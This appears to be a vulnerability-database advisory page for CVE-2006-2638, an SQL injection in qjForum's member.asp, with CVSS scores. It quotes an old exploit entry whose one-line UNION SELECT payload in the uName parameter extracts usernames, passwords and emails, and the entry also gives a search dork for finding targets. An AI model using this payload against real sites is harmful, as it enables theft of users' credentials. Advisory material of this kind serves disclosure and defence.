6.4
CVSSv2

CVE-2006-2638

Published: 30/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

SQL injection vulnerability in member.asp in qjForum allows remote malicious users to execute arbitrary SQL commands via the uName parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

qjstudios qjforum

Exploits

# Title : qjForum(memberasp) SQL Injection Vulnerability # Author : ajann # greetz : Nukedx,TheHacker # Dork : "qjForum" # Exploit: # Login before injection ### target/[path]/memberasp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member # milw0rmcom [2006-05-26] ...